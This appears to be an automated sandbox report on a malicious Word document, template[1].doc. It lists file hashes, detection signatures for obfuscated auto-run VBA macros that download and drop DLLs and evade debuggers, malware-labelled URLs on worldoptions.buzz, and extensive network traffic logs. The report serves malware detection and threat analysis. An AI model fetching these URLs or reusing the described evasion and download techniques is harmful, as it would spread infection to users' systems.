Windows Analysis Report
template[1].doc

Overview

General Information

Sample Name: template[1].doc
Analysis ID: 683638
MD5: 8f21756219d4e736219011174eb0534b
SHA1: 4429c35b62d55abe159e130c095fc988e640f3fd
SHA256: 394c97cc9d567e556a357f129aea03f737cbd2a1761df32146ef69d93afc73dc
Tags: doc
Infos:

Detection

Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Document exploit detected (drops PE files)
System process connects to network (likely due to code injection or exploit)
Document exploit detected (creates forbidden files)
Antivirus detection for URL or domain
Document contains an embedded VBA which contains extensive loops (likely to delay execution)
Document contains an embedded VBA with many string operations indicating source code obfuscation
Office process drops PE file
Machine Learning detection for sample
Document contains an embedded VBA macro with suspicious strings
Tries to detect virtualization through RDTSC time measurements
Machine Learning detection for dropped file
Document exploit detected (UrlDownloadToFile)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Document contains an embedded VBA macro which executes code when the document is opened / closed
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to dynamically determine API calls
Potential document exploit detected (performs DNS queries)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains functionality for execution timing, often used to detect debuggers
Document misses a certain OLE stream usually present in this Microsoft Office document type
Potential document exploit detected (unknown TCP traffic)
Extensive use of GetProcAddress (often used to hide API calls)
Drops PE files
Uses a known web browser user agent for HTTP communication
Document contains embedded VBA macros
Dropped file seen in connection with other malware
Potential document exploit detected (performs HTTP gets)
Creates a process in suspended mode (likely to inject code)

Classification

AV Detection

Source: template[1].doc Virustotal: Detection: 12%
Source: http://worldoptions.buzz/agE7nqQLgssuVeUY/OGHAYZZFhfCtspqorBFNYMrxHN7TXIlz8vjv1TPmuyrc2yIu.mp4 Avira URL Cloud: Label: malware
Source: http://worldoptions.buzz/agE7nqQLgssuVeUY/OGHAYZZFhfCtspqorBFNYMrxHN7TXIlz8vjv1TPmuyrc2yIu.png Avira URL Cloud: Label: malware
Source: template[1].doc Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\dnrdfsi11023.dll Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\wnitmpo.dll Joe Sandbox ML: detected
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: unknown HTTPS traffic detected: 142.250.185.228:443 -> 192.168.2.22:49172 version: TLS 1.2
Source: unknown HTTPS traffic detected: 64.52.80.180:443 -> 192.168.2.22:49175 version: TLS 1.2

Software Vulnerabilities

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: wnitmpo.dll.0.dr
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Temp\wnitmpo.dll
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Temp\dnrdfsi11023.dll
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Section loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToCacheFileA
Source: global traffic DNS query: name: worldoptions.buzz
Source: global traffic DNS query: name: www.google.com
Source: global traffic DNS query: name: com.lightbuzear.buzz
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global traffic TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global traffic TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global traffic TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global traffic TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global traffic TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global traffic TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global traffic TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global traffic TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global traffic TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global traffic TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global traffic TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global traffic TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global traffic TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global traffic TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global traffic TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global traffic TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global traffic TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global traffic TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global traffic TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global traffic TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global traffic TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global traffic TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global traffic TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global traffic TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global traffic TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global traffic TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global traffic TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.185.228:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.185.228:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.185.228:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.185.228:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.185.228:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.185.228:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.185.228:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.185.228:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.185.228:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.185.228:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.185.228:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.185.228:443
Source: global traffic TCP traffic: 192.168.2.22:49173 -> 142.250.185.228:443
Source: global traffic TCP traffic: 192.168.2.22:49173 -> 142.250.185.228:443
Source: global traffic TCP traffic: 192.168.2.22:49173 -> 142.250.185.228:443
Source: global traffic TCP traffic: 192.168.2.22:49173 -> 142.250.185.228:443
Source: global traffic TCP traffic: 192.168.2.22:49173 -> 142.250.185.228:443
Source: global traffic TCP traffic: 192.168.2.22:49173 -> 142.250.185.228:443
Source: global traffic TCP traffic: 192.168.2.22:49173 -> 142.250.185.228:443
Source: global traffic TCP traffic: 192.168.2.22:49173 -> 142.250.185.228:443
Source: global traffic TCP traffic: 192.168.2.22:49173 -> 142.250.185.228:443
Source: global traffic TCP traffic: 192.168.2.22:49173 -> 142.250.185.228:443
Source: global traffic TCP traffic: 192.168.2.22:49173 -> 142.250.185.228:443
Source: global traffic TCP traffic: 192.168.2.22:49174 -> 142.250.185.228:443
Source: global traffic TCP traffic: 192.168.2.22:49174 -> 142.250.185.228:443
Source: global traffic TCP traffic: 192.168.2.22:49174 -> 142.250.185.228:443
Source: global traffic TCP traffic: 192.168.2.22:49174 -> 142.250.185.228:443
Source: global traffic TCP traffic: 192.168.2.22:49174 -> 142.250.185.228:443
Source: global traffic TCP traffic: 192.168.2.22:49174 -> 142.250.185.228:443
Source: global traffic TCP traffic: 192.168.2.22:49174 -> 142.250.185.228:443
Source: global traffic TCP traffic: 192.168.2.22:49174 -> 142.250.185.228:443
Source: global traffic TCP traffic: 192.168.2.22:49174 -> 142.250.185.228:443
Source: global traffic TCP traffic: 192.168.2.22:49174 -> 142.250.185.228:443
Source: global traffic TCP traffic: 192.168.2.22:49174 -> 142.250.185.228:443
Source: global traffic TCP traffic: 192.168.2.22:49174 -> 142.250.185.228:443
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 64.52.80.180:443
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 64.52.80.180:443
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 64.52.80.180:443
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 64.52.80.180:443
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 64.52.80.180:443
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 64.52.80.180:443
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 64.52.80.180:443
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 64.52.80.180:443
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 64.52.80.180:443
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 64.52.80.180:443
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 64.52.80.180:443
Source: global traffic TCP traffic: 192.168.2.22:49176 -> 64.52.80.180:443
Source: global traffic TCP traffic: 192.168.2.22:49176 -> 64.52.80.180:443
Source: global traffic TCP traffic: 192.168.2.22:49176 -> 64.52.80.180:443
Source: global traffic TCP traffic: 192.168.2.22:49176 -> 64.52.80.180:443
Source: global traffic TCP traffic: 192.168.2.22:49176 -> 64.52.80.180:443
Source: global traffic TCP traffic: 192.168.2.22:49176 -> 64.52.80.180:443
Source: global traffic TCP traffic: 192.168.2.22:49176 -> 64.52.80.180:443
Source: global traffic TCP traffic: 192.168.2.22:49176 -> 64.52.80.180:443
Source: global traffic TCP traffic: 192.168.2.22:49176 -> 64.52.80.180:443
Source: global traffic TCP traffic: 192.168.2.22:49176 -> 64.52.80.180:443
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 64.52.80.180:443
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 64.52.80.180:443
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 64.52.80.180:443
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 64.52.80.180:443
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 64.52.80.180:443
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 64.52.80.180:443
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 64.52.80.180:443
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 64.52.80.180:443
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 64.52.80.180:443
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 64.52.80.180:443
Source: global traffic TCP traffic: 192.168.2.22:49178 -> 64.52.80.180:443
Source: global traffic TCP traffic: 192.168.2.22:49178 -> 64.52.80.180:443
Source: global traffic TCP traffic: 192.168.2.22:49178 -> 64.52.80.180:443
Source: global traffic TCP traffic: 192.168.2.22:49178 -> 64.52.80.180:443
Source: global traffic TCP traffic: 192.168.2.22:49178 -> 64.52.80.180:443
Source: global traffic TCP traffic: 192.168.2.22:49178 -> 64.52.80.180:443
Source: global traffic TCP traffic: 192.168.2.22:49178 -> 64.52.80.180:443
Source: global traffic TCP traffic: 192.168.2.22:49178 -> 64.52.80.180:443
Source: global traffic TCP traffic: 192.168.2.22:49178 -> 64.52.80.180:443
Source: global traffic TCP traffic: 192.168.2.22:49178 -> 64.52.80.180:443
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 64.52.80.180:443
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 64.52.80.180:443
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 64.52.80.180:443
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 64.52.80.180:443
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 64.52.80.180:443
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 64.52.80.180:443
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 64.52.80.180:443
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 64.52.80.180:443
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 64.52.80.180:443
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 64.52.80.180:443
Source: global traffic TCP traffic: 192.168.2.22:49180 -> 64.52.80.180:443
Source: global traffic TCP traffic: 192.168.2.22:49180 -> 64.52.80.180:443
Source: global traffic TCP traffic: 192.168.2.22:49180 -> 64.52.80.180:443
Source: global traffic TCP traffic: 192.168.2.22:49180 -> 64.52.80.180:443
Source: global traffic TCP traffic: 192.168.2.22:49180 -> 64.52.80.180:443
Source: global traffic TCP traffic: 192.168.2.22:49180 -> 64.52.80.180:443
Source: global traffic TCP traffic: 192.168.2.22:49180 -> 64.52.80.180:443
Source: global traffic TCP traffic: 192.168.2.22:49180 -> 64.52.80.180:443
Source: global traffic TCP traffic: 192.168.2.22:49180 -> 64.52.80.180:443
Source: global traffic TCP traffic: 192.168.2.22:49180 -> 64.52.80.180:443
Source: global traffic TCP traffic: 192.168.2.22:49181 -> 64.52.80.180:443
Source: global traffic TCP traffic: 192.168.2.22:49181 -> 64.52.80.180:443
Source: global traffic TCP traffic: 192.168.2.22:49181 -> 64.52.80.180:443
Source: global traffic TCP traffic: 192.168.2.22:49181 -> 64.52.80.180:443
Source: global traffic TCP traffic: 192.168.2.22:49181 -> 64.52.80.180:443
Source: global traffic TCP traffic: 192.168.2.22:49181 -> 64.52.80.180:443
Source: global traffic TCP traffic: 192.168.2.22:49181 -> 64.52.80.180:443
Source: global traffic TCP traffic: 192.168.2.22:49181 -> 64.52.80.180:443
Source: global traffic TCP traffic: 192.168.2.22:49181 -> 64.52.80.180:443
Source: global traffic TCP traffic: 192.168.2.22:49181 -> 64.52.80.180:443
Source: global traffic TCP traffic: 192.168.2.22:49182 -> 64.52.80.180:443
Source: global traffic TCP traffic: 192.168.2.22:49182 -> 64.52.80.180:443
Source: global traffic TCP traffic: 192.168.2.22:49182 -> 64.52.80.180:443
Source: global traffic TCP traffic: 192.168.2.22:49182 -> 64.52.80.180:443
Source: global traffic TCP traffic: 192.168.2.22:49182 -> 64.52.80.180:443
Source: global traffic TCP traffic: 192.168.2.22:49182 -> 64.52.80.180:443
Source: global traffic TCP traffic: 192.168.2.22:49182 -> 64.52.80.180:443
Source: global traffic TCP traffic: 192.168.2.22:49182 -> 64.52.80.180:443
Source: global traffic TCP traffic: 192.168.2.22:49182 -> 64.52.80.180:443
Source: global traffic TCP traffic: 192.168.2.22:49182 -> 64.52.80.180:443
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 64.52.80.180:443
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 64.52.80.180:443
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 64.52.80.180:443
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 64.52.80.180:443
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 64.52.80.180:443
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 64.52.80.180:443
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 64.52.80.180:443
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 64.52.80.180:443
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 64.52.80.180:443
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 64.52.80.180:443
Source: global traffic TCP traffic: 192.168.2.22:49184 -> 64.52.80.180:443
Source: global traffic TCP traffic: 192.168.2.22:49184 -> 64.52.80.180:443
Source: global traffic TCP traffic: 192.168.2.22:49184 -> 64.52.80.180:443
Source: global traffic TCP traffic: 192.168.2.22:49184 -> 64.52.80.180:443
Source: global traffic TCP traffic: 192.168.2.22:49184 -> 64.52.80.180:443
Source: global traffic TCP traffic: 192.168.2.22:49184 -> 64.52.80.180:443
Source: global traffic TCP traffic: 192.168.2.22:49184 -> 64.52.80.180:443
Source: global traffic TCP traffic: 192.168.2.22:49184 -> 64.52.80.180:443
Source: global traffic TCP traffic: 192.168.2.22:49184 -> 64.52.80.180:443
Source: global traffic TCP traffic: 192.168.2.22:49184 -> 64.52.80.180:443
Source: global traffic TCP traffic: 192.168.2.22:49185 -> 64.52.80.180:443
Source: global traffic TCP traffic: 192.168.2.22:49185 -> 64.52.80.180:443
Source: global traffic TCP traffic: 192.168.2.22:49185 -> 64.52.80.180:443
Source: global traffic TCP traffic: 192.168.2.22:49185 -> 64.52.80.180:443
Source: global traffic TCP traffic: 192.168.2.22:49185 -> 64.52.80.180:443
Source: global traffic TCP traffic: 192.168.2.22:49185 -> 64.52.80.180:443
Source: global traffic TCP traffic: 192.168.2.22:49185 -> 64.52.80.180:443
Source: global traffic TCP traffic: 192.168.2.22:49185 -> 64.52.80.180:443
Source: global traffic TCP traffic: 192.168.2.22:49185 -> 64.52.80.180:443
Source: global traffic TCP traffic: 192.168.2.22:49186 -> 64.52.80.180:443
Source: global traffic TCP traffic: 192.168.2.22:49186 -> 64.52.80.180:443
Source: global traffic TCP traffic: 192.168.2.22:49186 -> 64.52.80.180:443
Source: global traffic TCP traffic: 192.168.2.22:49186 -> 64.52.80.180:443
Source: global traffic TCP traffic: 192.168.2.22:49186 -> 64.52.80.180:443
Source: global traffic TCP traffic: 192.168.2.22:49186 -> 64.52.80.180:443
Source: global traffic TCP traffic: 192.168.2.22:49186 -> 64.52.80.180:443
Source: global traffic TCP traffic: 192.168.2.22:49186 -> 64.52.80.180:443
Source: global traffic TCP traffic: 192.168.2.22:49186 -> 64.52.80.180:443
Source: global traffic TCP traffic: 192.168.2.22:49186 -> 64.52.80.180:443
Source: global traffic TCP traffic: 192.168.2.22:49187 -> 64.52.80.180:443
Source: global traffic TCP traffic: 192.168.2.22:49187 -> 64.52.80.180:443
Source: global traffic TCP traffic: 192.168.2.22:49187 -> 64.52.80.180:443
Source: global traffic TCP traffic: 192.168.2.22:49187 -> 64.52.80.180:443
Source: global traffic TCP traffic: 192.168.2.22:49187 -> 64.52.80.180:443
Source: global traffic TCP traffic: 192.168.2.22:49187 -> 64.52.80.180:443
Source: global traffic TCP traffic: 192.168.2.22:49187 -> 64.52.80.180:443
Source: global traffic TCP traffic: 192.168.2.22:49187 -> 64.52.80.180:443
Source: global traffic TCP traffic: 192.168.2.22:49187 -> 64.52.80.180:443
Source: global traffic TCP traffic: 192.168.2.22:49187 -> 64.52.80.180:443
Source: global traffic TCP traffic: 192.168.2.22:49187 -> 64.52.80.180:443
Source: global traffic TCP traffic: 192.168.2.22:49188 -> 64.52.80.180:443
Source: global traffic TCP traffic: 192.168.2.22:49188 -> 64.52.80.180:443
Source: global traffic TCP traffic: 192.168.2.22:49188 -> 64.52.80.180:443
Source: global traffic TCP traffic: 192.168.2.22:49188 -> 64.52.80.180:443
Source: global traffic TCP traffic: 192.168.2.22:49188 -> 64.52.80.180:443
Source: global traffic TCP traffic: 192.168.2.22:49188 -> 64.52.80.180:443
Source: global traffic TCP traffic: 192.168.2.22:49188 -> 64.52.80.180:443
Source: global traffic TCP traffic: 192.168.2.22:49188 -> 64.52.80.180:443
Source: global traffic TCP traffic: 192.168.2.22:49188 -> 64.52.80.180:443
Source: global traffic TCP traffic: 192.168.2.22:49188 -> 64.52.80.180:443
Source: global traffic TCP traffic: 192.168.2.22:49189 -> 64.52.80.180:443
Source: global traffic TCP traffic: 192.168.2.22:49189 -> 64.52.80.180:443
Source: global traffic TCP traffic: 192.168.2.22:49189 -> 64.52.80.180:443
Source: global traffic TCP traffic: 192.168.2.22:49189 -> 64.52.80.180:443
Source: global traffic TCP traffic: 192.168.2.22:49189 -> 64.52.80.180:443
Source: global traffic TCP traffic: 192.168.2.22:49189 -> 64.52.80.180:443
Source: global traffic TCP traffic: 192.168.2.22:49189 -> 64.52.80.180:443
Source: global traffic TCP traffic: 192.168.2.22:49189 -> 64.52.80.180:443
Source: global traffic TCP traffic: 192.168.2.22:49189 -> 64.52.80.180:443
Source: global traffic TCP traffic: 192.168.2.22:49189 -> 64.52.80.180:443
Source: global traffic TCP traffic: 192.168.2.22:49190 -> 64.52.80.180:443
Source: global traffic TCP traffic: 192.168.2.22:49190 -> 64.52.80.180:443
Source: global traffic TCP traffic: 192.168.2.22:49190 -> 64.52.80.180:443
Source: global traffic TCP traffic: 192.168.2.22:49190 -> 64.52.80.180:443
Source: global traffic TCP traffic: 192.168.2.22:49190 -> 64.52.80.180:443
Source: global traffic TCP traffic: 192.168.2.22:49190 -> 64.52.80.180:443
Source: global traffic TCP traffic: 192.168.2.22:49190 -> 64.52.80.180:443
Source: global traffic TCP traffic: 192.168.2.22:49190 -> 64.52.80.180:443
Source: global traffic TCP traffic: 192.168.2.22:49190 -> 64.52.80.180:443
Source: global traffic TCP traffic: 192.168.2.22:49191 -> 64.52.80.180:443
Source: global traffic TCP traffic: 192.168.2.22:49191 -> 64.52.80.180:443
Source: global traffic TCP traffic: 192.168.2.22:49191 -> 64.52.80.180:443
Source: global traffic TCP traffic: 192.168.2.22:49191 -> 64.52.80.180:443
Source: global traffic TCP traffic: 192.168.2.22:49191 -> 64.52.80.180:443
Source: global traffic TCP traffic: 192.168.2.22:49191 -> 64.52.80.180:443
Source: global traffic TCP traffic: 192.168.2.22:49191 -> 64.52.80.180:443
Source: global traffic TCP traffic: 192.168.2.22:49191 -> 64.52.80.180:443
Source: global traffic TCP traffic: 192.168.2.22:49191 -> 64.52.80.180:443
Source: global traffic TCP traffic: 192.168.2.22:49191 -> 64.52.80.180:443
Source: global traffic TCP traffic: 192.168.2.22:49192 -> 64.52.80.180:443
Source: global traffic TCP traffic: 192.168.2.22:49192 -> 64.52.80.180:443
Source: global traffic TCP traffic: 192.168.2.22:49192 -> 64.52.80.180:443
Source: global traffic TCP traffic: 192.168.2.22:49192 -> 64.52.80.180:443
Source: global traffic TCP traffic: 192.168.2.22:49192 -> 64.52.80.180:443
Source: global traffic TCP traffic: 192.168.2.22:49192 -> 64.52.80.180:443
Source: global traffic TCP traffic: 192.168.2.22:49192 -> 64.52.80.180:443
Source: global traffic TCP traffic: 192.168.2.22:49192 -> 64.52.80.180:443
Source: global traffic TCP traffic: 192.168.2.22:49192 -> 64.52.80.180:443
Source: global traffic TCP traffic: 192.168.2.22:49192 -> 64.52.80.180:443
Source: global traffic TCP traffic: 192.168.2.22:49193 -> 64.52.80.180:443
Source: global traffic TCP traffic: 192.168.2.22:49193 -> 64.52.80.180:443
Source: global traffic TCP traffic: 192.168.2.22:49193 -> 64.52.80.180:443
Source: global traffic TCP traffic: 192.168.2.22:49193 -> 64.52.80.180:443
Source: global traffic TCP traffic: 192.168.2.22:49193 -> 64.52.80.180:443
Source: global traffic TCP traffic: 192.168.2.22:49193 -> 64.52.80.180:443
Source: global traffic TCP traffic: 192.168.2.22:49193 -> 64.52.80.180:443
Source: global traffic TCP traffic: 192.168.2.22:49193 -> 64.52.80.180:443
Source: global traffic TCP traffic: 192.168.2.22:49193 -> 64.52.80.180:443
Source: global traffic TCP traffic: 192.168.2.22:49193 -> 64.52.80.180:443
Source: global traffic TCP traffic: 192.168.2.22:49194 -> 64.52.80.180:443
Source: global traffic TCP traffic: 192.168.2.22:49194 -> 64.52.80.180:443
Source: global traffic TCP traffic: 192.168.2.22:49194 -> 64.52.80.180:443
Source: global traffic TCP traffic: 192.168.2.22:49194 -> 64.52.80.180:443
Source: global traffic TCP traffic: 192.168.2.22:49194 -> 64.52.80.180:443
Source: global traffic TCP traffic: 192.168.2.22:49194 -> 64.52.80.180:443
Source: global traffic TCP traffic: 192.168.2.22:49194 -> 64.52.80.180:443
Source: global traffic TCP traffic: 192.168.2.22:49194 -> 64.52.80.180:443
Source: global traffic TCP traffic: 192.168.2.22:49194 -> 64.52.80.180:443
Source: global traffic TCP traffic: 192.168.2.22:49194 -> 64.52.80.180:443
Source: global traffic TCP traffic: 192.168.2.22:49194 -> 64.52.80.180:443
Source: global traffic TCP traffic: 192.168.2.22:49195 -> 64.52.80.180:443
Source: global traffic TCP traffic: 192.168.2.22:49195 -> 64.52.80.180:443
Source: global traffic TCP traffic: 192.168.2.22:49195 -> 64.52.80.180:443
Source: global traffic TCP traffic: 192.168.2.22:49195 -> 64.52.80.180:443
Source: global traffic TCP traffic: 192.168.2.22:49195 -> 64.52.80.180:443
Source: global traffic TCP traffic: 192.168.2.22:49195 -> 64.52.80.180:443
Source: global traffic TCP traffic: 192.168.2.22:49195 -> 64.52.80.180:443
Source: global traffic TCP traffic: 192.168.2.22:49195 -> 64.52.80.180:443
Source: global traffic TCP traffic: 192.168.2.22:49195 -> 64.52.80.180:443
